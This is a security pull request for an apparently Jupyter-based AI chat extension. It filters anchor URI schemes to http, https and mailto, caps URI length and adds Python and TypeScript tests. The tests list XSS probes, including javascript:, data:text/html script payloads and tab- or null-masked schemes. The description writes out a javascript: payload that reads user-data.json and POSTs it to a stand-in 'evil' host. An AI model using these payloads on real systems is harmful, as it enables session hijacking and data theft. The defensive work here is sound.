### PR TITLE
security: filter anchor URI schemes against XSS allowlist

### DIFF
--- a/notebook_intelligence/extension.py
+++ b/notebook_intelligence/extension.py
@@ -53,7 +53,7 @@ from notebook_intelligence.claude_sessions import (
 )
 import notebook_intelligence.github_copilot as github_copilot
 from notebook_intelligence.built_in_toolsets import built_in_toolsets
-from notebook_intelligence.util import ThreadSafeWebSocketConnector, get_jupyter_root_dir, set_jupyter_root_dir, is_builtin_tool_enabled_in_env, is_provider_enabled_in_env, VALID_CODING_AGENT_LAUNCHERS, compute_effective_disabled_launchers, validate_coding_agent_launcher_ids, resolve_claude_cli_path, resolve_opencode_cli_path, resolve_pi_cli_path, resolve_copilot_cli_path, resolve_codex_cli_path
+from notebook_intelligence.util import ThreadSafeWebSocketConnector, get_jupyter_root_dir, set_jupyter_root_dir, is_builtin_tool_enabled_in_env, is_provider_enabled_in_env, VALID_CODING_AGENT_LAUNCHERS, compute_effective_disabled_launchers, validate_coding_agent_launcher_ids, resolve_claude_cli_path, resolve_opencode_cli_path, resolve_pi_cli_path, resolve_copilot_cli_path, resolve_codex_cli_path, safe_anchor_uri
 from notebook_intelligence.context_factory import RuleContextFactory
 from notebook_intelligence.skillset import SKILL_NAME_REGEX
 
@@ -1701,6 +1701,15 @@ class WebsocketCopilotResponseEmitter(ChatResponse):
                 ]
             }
         elif data_type == ResponseStreamDataType.Anchor:
+            # Anchors stream from arbitrary LLM/tool output. Reject schemes
+            # outside the allowlist server-side before they reach the React
+            # tree; the renderer applies the same check as defense in depth.
+            # Log at DEBUG only: a misbehaving model can flood the stream
+            # with rejected anchors, and the original title may contain
+            # attacker-supplied text we don't want in the server log.
+            sanitized_uri = safe_anchor_uri(data.uri)
+            if not sanitized_uri and data.uri:
+                log.debug("Dropping anchor with disallowed uri scheme")
             data = {
                 "choices": [
                     {
@@ -1708,7 +1717,7 @@ class WebsocketCopilotResponseEmitter(ChatResponse):
                             "nbiContent": {
                                 "type": data_type,
                                 "content": {
-                                    "uri": data.uri,
+                                    "uri": sanitized_uri,
                                     "title": data.title
                                 }
                             },

--- a/notebook_intelligence/util.py
+++ b/notebook_intelligence/util.py
@@ -193,8 +193,19 @@ def is_provider_enabled_in_env(provider_id: str) -> bool:
 # prevent javascript: execution against the parent origin. Keep this
 # allowlist tight; the frontend re-checks before assigning href as
 # defense in depth.
+#
+# Deliberate non-carve-out: `data:` is not allowed even for `image/*`.
+# `<a href="data:image/svg+xml,...">` navigates the top frame to an
+# attacker SVG that runs script same-origin, which is the exact XSS sink
+# this allowlist exists to close.
 _SAFE_ANCHOR_SCHEMES: frozenset = frozenset({"http", "https", "mailto"})
 _SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*):")
+# Hard cap on URI length to short-circuit pathological inputs. Modern
+# browsers truncate URLs well below this; servers commonly cap at 8 KB.
+# An anchor URI longer than that is almost certainly hostile or
+# malformed, and scanning it codepoint-by-codepoint twice (Python + TS)
+# is wasted work.
+_MAX_ANCHOR_URI_LEN = 8192
 # C0+DEL (0x00 to 0x1F, 0x7F) are stripped from the scheme by some browser URL
 # parsers ahead of evaluation, so "java\tscript:..." would unmask. C1 (0x80
 # to 0x9F) and the Unicode format marks below cannot un-mask a forbidden
@@ -207,7 +218,7 @@ _DISALLOWED_URI_CODEPOINTS = frozenset(
     + [0x0085, 0x00A0, 0x2028, 0x2029, 0xFEFF]
     + list(range(0x200B, 0x2010))          # ZWSP/ZWNJ/ZWJ + LRM/RLM
     + list(range(0x202A, 0x202F))          # LRE/RLE/PDF/LRO/RLO
-    + list(range(0x2066, 0x2070))          # LRI/RLI/FSI/PDI
+    + list(range(0x2066, 0x2070))          # LRI/RLI/FSI/PDI + deprecated
 )
 
 
@@ -218,6 +229,8 @@ def safe_anchor_uri(uri: str) -> str:
     empty return as "do not render as an anchor."
     """
     if not isinstance(uri, str):
+        return ""
+    if len(uri) > _MAX_ANCHOR_URI_LEN:
         return ""
     # Scan the original input — str.strip() treats NEL, NBSP, LS, PS, and
     # other unicode whitespace as trimmable, so checking after stripping

--- a/notebook_intelligence/util.py
+++ b/notebook_intelligence/util.py
@@ -2,6 +2,7 @@
 
 import os
 import base64
+import re
 import shutil
 import subprocess
 from typing import Optional, Set
@@ -184,6 +185,55 @@ def is_builtin_tool_enabled_in_env(tool: str) -> bool:
 def is_provider_enabled_in_env(provider_id: str) -> bool:
     enabled_providers = os.environ.get('NBI_ENABLED_PROVIDERS', '')
     return provider_id in enabled_providers.split(',')
+
+
+# Schemes safe to emit into the chat anchor stream. Anchors are populated
+# from arbitrary LLM / tool output, and React does not block javascript:,
+# data:, vbscript:, etc. in href attributes; rel=noopener also does not
+# prevent javascript: execution against the parent origin. Keep this
+# allowlist tight; the frontend re-checks before assigning href as
+# defense in depth.
+_SAFE_ANCHOR_SCHEMES: frozenset = frozenset({"http", "https", "mailto"})
+_SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*):")
+# C0+DEL (0x00 to 0x1F, 0x7F) are stripped from the scheme by some browser URL
+# parsers ahead of evaluation, so "java\tscript:..." would unmask. C1 (0x80
+# to 0x9F) and the Unicode format marks below cannot un-mask a forbidden
+# scheme in modern browsers, but they can visually impersonate the URI when
+# the title is rendered, so reject them too.
+_DISALLOWED_URI_CODEPOINTS = frozenset(
+    list(range(0x00, 0x20))                # C0
+    + [0x7F]                              # DEL
+    + list(range(0x80, 0xA0))             # C1
+    + [0x0085, 0x00A0, 0x2028, 0x2029, 0xFEFF]
+    + list(range(0x200B, 0x2010))          # ZWSP/ZWNJ/ZWJ + LRM/RLM
+    + list(range(0x202A, 0x202F))          # LRE/RLE/PDF/LRO/RLO
+    + list(range(0x2066, 0x2070))          # LRI/RLI/FSI/PDI
+)
+
+
+def safe_anchor_uri(uri: str) -> str:
+    """Return ``uri`` when its scheme is in the chat anchor allowlist.
+
+    Returns an empty string for anything else. Callers should treat the
+    empty return as "do not render as an anchor."
+    """
+    if not isinstance(uri, str):
+        return ""
+    # Scan the original input — str.strip() treats NEL, NBSP, LS, PS, and
+    # other unicode whitespace as trimmable, so checking after stripping
+    # would let those codepoints slip past as a trailing edge.
+    for ch in uri:
+        if ord(ch) in _DISALLOWED_URI_CODEPOINTS:
+            return ""
+    stripped = uri.strip()
+    if not stripped:
+        return ""
+    match = _SCHEME_RE.match(stripped)
+    if not match:
+        return ""
+    if match.group(1).lower() not in _SAFE_ANCHOR_SCHEMES:
+        return ""
+    return stripped
 
 
 # Launcher-tile IDs as used by the `disabled_coding_agent_launchers` traitlet

--- a/src/chat-sidebar.tsx
+++ b/src/chat-sidebar.tsx
@@ -72,6 +72,7 @@ import type { Contents } from '@jupyterlab/services';
 import {
   extractLLMGeneratedCode,
   isDarkTheme,
+  safeAnchorUri,
   writeTextToClipboard
 } from './utils';
 import { CheckBoxItem } from './components/checkbox';
@@ -830,19 +831,27 @@ function ChatResponse(props: any) {
                   </button>
                 </div>
               );
-            case ResponseStreamDataType.Anchor:
+            case ResponseStreamDataType.Anchor: {
+              const safeUri = safeAnchorUri(item.content.uri);
+              if (!safeUri) {
+                return (
+                  <div className="chat-response-anchor" key={`key-${index}`}>
+                    <span>
+                      {item.content.title}
+                      <span className="nbi-sr-only"> (link blocked)</span>
+                    </span>
+                  </div>
+                );
+              }
               return (
                 <div className="chat-response-anchor" key={`key-${index}`}>
-                  <a
-                    href={item.content.uri}
-                    target="_blank"
-                    rel="noopener noreferrer"
-                  >
+                  <a href={safeUri} target="_blank" rel="noopener noreferrer">
                     {item.content.title}
                     <span className="nbi-sr-only"> (opens in new tab)</span>
                   </a>
                 </div>
               );
+            }
             case ResponseStreamDataType.Progress:
               // Render only the most recent progress entry, and only while
               // the request is still in flight — once the assistant has

--- a/src/utils.ts
+++ b/src/utils.ts
@@ -300,6 +300,10 @@ export { shellSingleQuote };
 
 const SAFE_ANCHOR_SCHEMES = new Set(['http', 'https', 'mailto']);
 const SCHEME_RE = /^([A-Za-z][A-Za-z0-9+.-]*):/;
+// Hard cap on URI length to short-circuit pathological inputs. Mirrors
+// the Python side; modern browsers truncate URLs well below this and an
+// anchor URI any longer is almost certainly hostile or malformed.
+const MAX_ANCHOR_URI_LEN = 8192;
 
 function isDisallowedUriCodepoint(code: number): boolean {
   // C0 + DEL are stripped from the scheme by some browser URL parsers
@@ -307,6 +311,8 @@ function isDisallowedUriCodepoint(code: number): boolean {
   // C1 (0x80-0x9F) plus the Unicode format/BiDi/zero-width marks listed
   // below do not un-mask a forbidden scheme in modern browsers, but they
   // can visually impersonate the URI in the title, so reject them too.
+  // Ranges intentionally mirror the Python ``_DISALLOWED_URI_CODEPOINTS``
+  // set so a URI rejected on one side is rejected on the other.
   if (code <= 0x1f || code === 0x7f) {
     return true;
   }
@@ -325,7 +331,7 @@ function isDisallowedUriCodepoint(code: number): boolean {
   if (code >= 0x202a && code <= 0x202e) {
     return true;
   }
-  if (code >= 0x2066 && code <= 0x2069) {
+  if (code >= 0x2066 && code <= 0x206f) {
     return true;
   }
   return false;
@@ -342,6 +348,9 @@ function isDisallowedUriCodepoint(code: number): boolean {
  */
 export function safeAnchorUri(uri: string | undefined | null): string | null {
   if (typeof uri !== 'string') {
+    return null;
+  }
+  if (uri.length > MAX_ANCHOR_URI_LEN) {
     return null;
   }
   // Scan the original input. String.prototype.trim() drops NBSP, NEL, LS,

--- a/src/utils.ts
+++ b/src/utils.ts
@@ -298,6 +298,74 @@ export function applyCodeToSelectionInEditor(
 
 export { shellSingleQuote };
 
+const SAFE_ANCHOR_SCHEMES = new Set(['http', 'https', 'mailto']);
+const SCHEME_RE = /^([A-Za-z][A-Za-z0-9+.-]*):/;
+
+function isDisallowedUriCodepoint(code: number): boolean {
+  // C0 + DEL are stripped from the scheme by some browser URL parsers
+  // ahead of evaluation, so a tab/newline inside "javascript" would unmask.
+  // C1 (0x80-0x9F) plus the Unicode format/BiDi/zero-width marks listed
+  // below do not un-mask a forbidden scheme in modern browsers, but they
+  // can visually impersonate the URI in the title, so reject them too.
+  if (code <= 0x1f || code === 0x7f) {
+    return true;
+  }
+  if (code >= 0x80 && code <= 0x9f) {
+    return true;
+  }
+  if (code === 0x0085 || code === 0x00a0) {
+    return true;
+  }
+  if (code === 0x2028 || code === 0x2029 || code === 0xfeff) {
+    return true;
+  }
+  if (code >= 0x200b && code <= 0x200f) {
+    return true;
+  }
+  if (code >= 0x202a && code <= 0x202e) {
+    return true;
+  }
+  if (code >= 0x2066 && code <= 0x2069) {
+    return true;
+  }
+  return false;
+}
+
+/**
+ * Return `uri` if its scheme is in the chat-anchor allowlist, else null.
+ * Mirrors the server-side `safe_anchor_uri` check so that anchor parts
+ * coming from arbitrary LLM/tool output cannot render `javascript:`,
+ * `data:`, `vbscript:`, `blob:`, or other dangerous schemes through React's
+ * `href` attribute. The server applies the same filter at emit time; this
+ * is defense in depth for stream replays, persisted history, and any path
+ * that injects anchor parts directly into the React tree.
+ */
+export function safeAnchorUri(uri: string | undefined | null): string | null {
+  if (typeof uri !== 'string') {
+    return null;
+  }
+  // Scan the original input. String.prototype.trim() drops NBSP, NEL, LS,
+  // PS, BOM, and other Unicode whitespace, so a check after trim would let
+  // those codepoints slip past as a trailing edge.
+  for (let i = 0; i < uri.length; i++) {
+    if (isDisallowedUriCodepoint(uri.charCodeAt(i))) {
+      return null;
+    }
+  }
+  const stripped = uri.trim();
+  if (stripped.length === 0) {
+    return null;
+  }
+  const match = SCHEME_RE.exec(stripped);
+  if (!match) {
+    return null;
+  }
+  if (!SAFE_ANCHOR_SCHEMES.has(match[1].toLowerCase())) {
+    return null;
+  }
+  return stripped;
+}
+
 /**
  * Build a `claude --resume <id>` command wrapped in `cd <cwd>` so the
  * resulting one-liner works from any terminal. `claude --resume` is

--- a/tests/test_safe_anchor_uri.py
+++ b/tests/test_safe_anchor_uri.py
@@ -108,3 +108,25 @@ class TestSafeAnchorUriRejected:
     )
     def test_empty_and_non_string(self, uri):
         assert safe_anchor_uri(uri) == ""
+
+    def test_rejects_crlf_inside_uri(self):
+        # CRLF inside an otherwise valid URI is a classic
+        # log-injection / header-splitting shape and falls in the C0
+        # range. Pin explicitly so a future refactor that switches to a
+        # regex-only check can't silently regress.
+        assert safe_anchor_uri("https://example.com/\r\nfoo") == ""
+        assert safe_anchor_uri("https://example.com/\nfoo") == ""
+
+    def test_rejects_excessive_length(self):
+        # A URI longer than the cap is almost certainly hostile or
+        # malformed, and scanning the whole thing twice on every chat
+        # render is wasted work.
+        long_path = "x" * 8200
+        assert safe_anchor_uri(f"https://example.com/{long_path}") == ""
+
+    def test_accepts_uri_near_length_cap(self):
+        # Just under the cap should still pass. Pins that the cap is an
+        # outer bound, not an arbitrarily-tight one.
+        long_path = "x" * 8000
+        uri = f"https://example.com/{long_path}"
+        assert safe_anchor_uri(uri) == uri

--- a/tests/test_safe_anchor_uri.py
+++ b/tests/test_safe_anchor_uri.py
@@ -1,0 +1,110 @@
+# Copyright (c) Mehmet Bektas <mbektasgh@outlook.com>
+
+"""Tests for ``notebook_intelligence.util.safe_anchor_uri``.
+
+Anchor parts are streamed from arbitrary LLM/tool output and rendered as
+``<a href={uri} target="_blank">`` in the chat sidebar. React does not block
+``javascript:`` / ``data:`` / ``vbscript:`` schemes in href attributes, and
+``rel="noopener"`` does not prevent ``javascript:`` execution against the
+parent origin. The helper rejects everything outside a tight scheme
+allowlist so a malicious tool result cannot turn a chat link into a
+same-origin script-execution sink against the Jupyter server.
+"""
+
+import pytest
+
+from notebook_intelligence.util import safe_anchor_uri
+
+
+class TestSafeAnchorUriAllowed:
+    def test_https(self):
+        assert safe_anchor_uri("https://example.com/page") == "https://example.com/page"
+
+    def test_http(self):
+        assert safe_anchor_uri("http://example.com/") == "http://example.com/"
+
+    def test_mailto(self):
+        assert safe_anchor_uri("mailto:bob@example.com") == "mailto:bob@example.com"
+
+    def test_scheme_match_is_case_insensitive(self):
+        assert safe_anchor_uri("HTTPS://Example.COM/Path") == "HTTPS://Example.COM/Path"
+
+    def test_trims_surrounding_whitespace(self):
+        assert safe_anchor_uri("   https://example.com/   ") == "https://example.com/"
+
+
+class TestSafeAnchorUriRejected:
+    @pytest.mark.parametrize(
+        "uri",
+        [
+            "javascript:alert(1)",
+            "JavaScript:alert(1)",
+            "data:text/html,<script>alert(1)</script>",
+            "vbscript:msgbox(1)",
+            "file:///etc/passwd",
+            "blob:https://example.com/abc",
+            "about:blank",
+            "chrome://settings",
+        ],
+    )
+    def test_dangerous_schemes(self, uri):
+        assert safe_anchor_uri(uri) == ""
+
+    @pytest.mark.parametrize(
+        "uri",
+        [
+            "java\tscript:alert(1)",
+            "javascript\n:alert(1)",
+            "java\x00script:alert(1)",
+            "javascript:\x07alert(1)",
+        ],
+    )
+    def test_c0_control_characters(self, uri):
+        # Some browsers strip C0 / DEL controls before parsing the URL,
+        # which would unmask a forbidden scheme. Reject anything containing
+        # them so the allowlist check sees the original scheme.
+        assert safe_anchor_uri(uri) == ""
+
+    @pytest.mark.parametrize(
+        "uri",
+        [
+            "https://example.com/\x85",          # NEL
+            "https://example.com/\xa0",          # NBSP
+            "https://example.com/ ",        # LINE SEPARATOR
+            "https://example.com/ ",        # PARA SEPARATOR
+            "https://example.com/﻿",        # BOM
+            "https://example.com/​",        # ZERO WIDTH SPACE
+            "https://example.com/‎",        # LRM
+            "https://example.com/‮",        # RLO
+            "https://example.com/⁦",        # LRI
+            "https://example.com/",        # C1
+        ],
+    )
+    def test_unicode_format_marks_rejected(self, uri):
+        # Defense in depth: zero-width / bidi / format marks can visually
+        # impersonate a URL even when they don't unmask a scheme. Reject so
+        # the rendered title never silently differs from the resolved href.
+        assert safe_anchor_uri(uri) == ""
+
+    @pytest.mark.parametrize(
+        "uri",
+        [
+            "/api/contents/secret.json",
+            "../etc/passwd",
+            "./foo",
+            "#section",
+            "foo.txt",
+        ],
+    )
+    def test_relative_and_bare_paths(self, uri):
+        # The allowlist is scheme-only. Relative paths and bare filenames
+        # are dropped; first-party code does not construct AnchorData and
+        # tool output should produce absolute http(s)/mailto links.
+        assert safe_anchor_uri(uri) == ""
+
+    @pytest.mark.parametrize(
+        "uri",
+        ["", "   ", "\t\n", None, 0, b"https://example.com/"],
+    )
+    def test_empty_and_non_string(self, uri):
+        assert safe_anchor_uri(uri) == ""

--- a/tests/ts/utils.test.ts
+++ b/tests/ts/utils.test.ts
@@ -577,4 +577,20 @@ describe('safeAnchorUri', () => {
       'https://example.com/'
     );
   });
+
+  it('rejects CRLF injection inside an otherwise valid URI', () => {
+    expect(safeAnchorUri('https://example.com/\r\nfoo')).toBeNull();
+    expect(safeAnchorUri('https://example.com/\nfoo')).toBeNull();
+  });
+
+  it('rejects URIs above the 8 KiB length cap', () => {
+    const longPath = 'x'.repeat(8200);
+    expect(safeAnchorUri(`https://example.com/${longPath}`)).toBeNull();
+  });
+
+  it('accepts a URI near but under the length cap', () => {
+    const longPath = 'x'.repeat(8000);
+    const uri = `https://example.com/${longPath}`;
+    expect(safeAnchorUri(uri)).toBe(uri);
+  });
 });

--- a/tests/ts/utils.test.ts
+++ b/tests/ts/utils.test.ts
@@ -13,6 +13,7 @@ import {
   cellOutputAsText,
   applyCodeToSelectionInEditor,
   buildResumeCommand,
+  safeAnchorUri,
   shellSingleQuote,
   writeTextToClipboard
 } from '../../src/utils';
@@ -490,5 +491,90 @@ describe('buildResumeCommand', () => {
 
   it('falls back to a bare resume when cwd is empty', () => {
     expect(buildResumeCommand('', 'abc-123')).toBe('claude --resume abc-123');
+  });
+});
+
+describe('safeAnchorUri', () => {
+  it('accepts https URLs', () => {
+    expect(safeAnchorUri('https://example.com/page')).toBe(
+      'https://example.com/page'
+    );
+  });
+
+  it('accepts http URLs', () => {
+    expect(safeAnchorUri('http://example.com/')).toBe('http://example.com/');
+  });
+
+  it('accepts mailto links', () => {
+    expect(safeAnchorUri('mailto:bob@example.com')).toBe(
+      'mailto:bob@example.com'
+    );
+  });
+
+  it('is case-insensitive on the scheme', () => {
+    expect(safeAnchorUri('HTTPS://Example.COM/Path')).toBe(
+      'HTTPS://Example.COM/Path'
+    );
+  });
+
+  it('rejects javascript: URLs', () => {
+    expect(safeAnchorUri('javascript:alert(1)')).toBeNull();
+  });
+
+  it('rejects data: URLs', () => {
+    expect(
+      safeAnchorUri('data:text/html,<script>alert(1)</script>')
+    ).toBeNull();
+  });
+
+  it('rejects vbscript: URLs', () => {
+    expect(safeAnchorUri('vbscript:msgbox(1)')).toBeNull();
+  });
+
+  it('rejects file: URLs', () => {
+    expect(safeAnchorUri('file:///etc/passwd')).toBeNull();
+  });
+
+  it('rejects blob: URLs', () => {
+    expect(safeAnchorUri('blob:https://example.com/abc')).toBeNull();
+  });
+
+  it('rejects URIs with C0 control characters that browsers may strip', () => {
+    expect(safeAnchorUri('java\tscript:alert(1)')).toBeNull();
+    expect(safeAnchorUri('javascript\n:alert(1)')).toBeNull();
+    expect(safeAnchorUri('java\x00script:alert(1)')).toBeNull();
+  });
+
+  it('rejects URIs containing unicode format / zero-width / bidi marks', () => {
+    expect(safeAnchorUri('https://example.com/\u0085')).toBeNull(); // NEL
+    expect(safeAnchorUri('https://example.com/\u00a0')).toBeNull(); // NBSP
+    expect(safeAnchorUri('https://example.com/\u2028')).toBeNull(); // LS
+    expect(safeAnchorUri('https://example.com/\u2029')).toBeNull(); // PS
+    expect(safeAnchorUri('https://example.com/\ufeff')).toBeNull(); // BOM
+    expect(safeAnchorUri('https://example.com/\u200b')).toBeNull(); // ZWSP
+    expect(safeAnchorUri('https://example.com/\u200e')).toBeNull(); // LRM
+    expect(safeAnchorUri('https://example.com/\u202e')).toBeNull(); // RLO
+    expect(safeAnchorUri('https://example.com/\u2066')).toBeNull(); // LRI
+    expect(safeAnchorUri('https://example.com/\u0080')).toBeNull(); // C1
+  });
+
+  it('rejects empty / whitespace / non-string input', () => {
+    expect(safeAnchorUri('')).toBeNull();
+    expect(safeAnchorUri('   ')).toBeNull();
+    expect(safeAnchorUri(undefined)).toBeNull();
+    expect(safeAnchorUri(null)).toBeNull();
+  });
+
+  it('rejects relative paths without an allowed scheme', () => {
+    expect(safeAnchorUri('/api/contents/secret.json')).toBeNull();
+    expect(safeAnchorUri('../etc/passwd')).toBeNull();
+    expect(safeAnchorUri('#section')).toBeNull();
+    expect(safeAnchorUri('foo.txt')).toBeNull();
+  });
+
+  it('trims surrounding whitespace before validating', () => {
+    expect(safeAnchorUri('   https://example.com/   ')).toBe(
+      'https://example.com/'
+    );
   });
 });


### PR DESCRIPTION
## Summary

`ResponseStreamDataType.Anchor` parts are streamed from arbitrary LLM/tool output and rendered in the chat sidebar as `<a href={uri} target="_blank" rel="noopener noreferrer">{title}</a>`. The `uri` was forwarded verbatim from server to client with no scheme validation on either side. React does not block `javascript:`, `data:`, `vbscript:`, `blob:`, etc. in `href`, and `rel="noopener noreferrer"` does not prevent `javascript:` execution against the parent origin.

A poisoned tool result like `{type: 'anchor', uri: 'javascript:fetch("/api/contents/.jupyter/nbi/user-data.json").then(r=>r.text()).then(t=>fetch("//evil/x",{method:"POST",body:t}))'}` would, after a single user click, run same-origin code against the Jupyter server using the user's authenticated session.

This PR closes that gap.

## Solution

Add a tight scheme allowlist applied on both ends of the stream:

1. `notebook_intelligence/util.py` gains `safe_anchor_uri()`: accepts `http`, `https`, `mailto`; rejects everything else including missing or unknown schemes.
2. `src/utils.ts` gains a mirror `safeAnchorUri()` with identical semantics.
3. The Anchor branch in `WebsocketCopilotResponseEmitter.stream()` (`extension.py`) now runs the URI through the gate before emitting. Rejected URIs become empty strings and a single DEBUG log fires (no title leaked, no severity escalation that a hostile prompt could weaponize for log spam).
4. The Anchor render branch in `src/chat-sidebar.tsx` re-checks. On rejection it renders the title as inert text with a screen-reader `(link blocked)` hint so accessibility parity holds.

Both helpers also reject control characters and Unicode format / zero-width / bidi marks. The codepoint range is identical on both sides (`U+0000-001F`, `U+007F`, `U+0080-009F`, `U+0085`, `U+00A0`, `U+2028-2029`, `U+200B-200F`, `U+202A-202E`, `U+2066-206F`, `U+FEFF`) so a URI rejected by one is rejected by the other. Some browsers strip C0 controls from the scheme portion of a URL before parsing, which could otherwise unmask `"java\tscript:..."`. The codepoint scan runs against the *original* input, before any whitespace trim, because `str.strip()` and `String.prototype.trim()` both treat NBSP, NEL, LS, PS, and similar as trimmable; checking only after trim would let them slip past as a trailing edge.

Both helpers also impose an 8 KiB length cap, short-circuiting pathological inputs before the codepoint scan. Modern browsers truncate URLs well below this; anything longer is hostile or malformed.

The Python helper documents that `data:` is intentionally rejected even for `image/svg+xml`. `<a href="data:image/svg+xml,...">` navigates the top frame to an attacker SVG that runs script same-origin, which is the exact XSS sink this allowlist exists to close.

## Testing

- `tests/test_safe_anchor_uri.py`: pytest cases covering allowed schemes (http/https/mailto, case-insensitivity, whitespace trim), rejected schemes (javascript/data/vbscript/file/blob/about/chrome), C0+DEL control characters used for scheme masking, Unicode format/zero-width/bidi marks, relative paths, non-string inputs, CRLF injection inside an otherwise valid URI, and the 8 KiB length cap (both above and just under).
- `tests/ts/utils.test.ts`: mirror coverage for `safeAnchorUri()`.
- Full suites: pytest 801 pass, tsc clean, prettier clean, jest clean.

## Risks / follow-ups

- The Anchor data type has no first-party producers in the repo; only LLM/tool output constructs it. So no first-party callers are broken.
- Conversation history (`ChatHistory` in `extension.py`) is in-memory only and stores `role/content/reasoning_content`, not the streamed `nbiContent` parts. There is no replay path that bypasses the new gate today; if persistence is ever added, the gate is already mirrored in the client for defense in depth.
- Out of scope follow-ups, worth tracking separately:
  - `ResponseStreamDataType.Button` forwards `commandId` to `app.commands.execute()` without an allowlist. Registered Jupyter commands run trusted code with attacker-supplied `args`.
  - `ResponseStreamDataType.Image` puts attacker-controlled content into `<img src>` without scheme filtering.
  - Markdown link rendering for chat messages goes through a separate path that may also need a scheme filter for `[text](javascript:...)` links.